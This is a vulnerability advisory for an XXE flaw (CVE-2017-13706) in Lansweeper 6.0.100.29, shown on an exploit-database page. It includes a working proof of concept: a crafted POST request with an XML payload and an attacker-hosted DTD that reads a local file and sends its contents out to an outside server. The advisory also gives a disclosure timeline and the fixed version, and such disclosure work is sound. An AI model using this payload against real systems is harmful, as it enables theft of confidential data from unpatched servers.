0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Lansweeper 6.0.100.29 XXE Injection Vulnerability
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
============================================= - Discovered by: BarkA+-n KA+-lA+-ASS, Mehmet Dursun Adegnce - Severity: High ============================================= I. VULNERABILITY ------------------------- Lansweeper XXE vulnerability. II. INTRODUCTION ------------------------- Lansweeper an Asset Management and Network Inventory Tool (v6.0.100.29 and probably all previous versions) is affected by a XXE vulnerability. III. DESCRIPTION ------------------------- 1) XML eXternel Entity Injection An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts. Reference: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing A* URL: hostname/deployment/DeploymentActions.aspx?action=importPackage A* Method: POST POC (proof of concept) The vulnerability can be trigged via a POST request as shown in the following PoC's. POST /deployment/DeploymentActions.aspx?action=importPackage HTTP/1.1 Host: 192.168.179.134:81 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://192.168.179.134:81/deployment/ Cookie: ASP.NET_SessionId=i05i2enzicanyusmf5inmawr; UserSettings=language=1; custauth=username=admin&userdomain=admin DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------141141110614240761271519111282 Content-Length: 390 -----------------------------141141110614240761271519111282 Content-Disposition: form-data; name="XML"; filename="test.xml" Content-Type: text/xml A-A>>A?<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://192.168.179.128:81/test.dtd"> %sp; %param1; ]> <r>&exfil;</r> -----------------------------141141110614240761271519111282 As an attacker a web server should be prepared and should be serving a file containing: cat test.dtd <!ENTITY % data SYSTEM "file:///C:\Program Files (x86)\Lansweeper\test.txt"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM ahttp://192.168.179.128/?%data;'>"> IV. BUSINESS IMPACT ------------------------- An attacker could reach and disclose confidential data, cause denial of service, server side request forgery. V. SYSTEMS AFFECTED ------------------------- Version 6.0.100.29 is vulnerable (probably all previous versions) VI. SOLUTION ------------------------- Upgrade to version 6.0.100.67 or later. VII. REFERENCES ------------------------- lansweeper website: https://www.lansweeper.com/ https://www.lansweeper.com/changelog.aspx BUG: #572705 VIII. CREDITS ------------------------- The vulnerability has been discovered by: BarkA+-n KA+-lA+-ASS barkin(at)barkin(dot)info Mehmet Dursun Adegnce mehmet(at)mehmetince(dot)net IX. ADVISORY TIMELINE ------------------------- August 26th, 2017: Vulnerability identification August 26th, 2017: CVE Requested August 27th, 2017: CVE received - "CVE-2017-13706" August 29th, 2017: First contact with vendor August 29th, 2017: Vendor response; investigating Sept 11th, 2017: Vendor says that the vulnerability will be fixed in the new version Oct 4th, 2017: Vulnerabilty fixed (Bug 572705). Reference: https://www.lansweeper.com/changelog.aspx # 0day.today [2024-11-15] #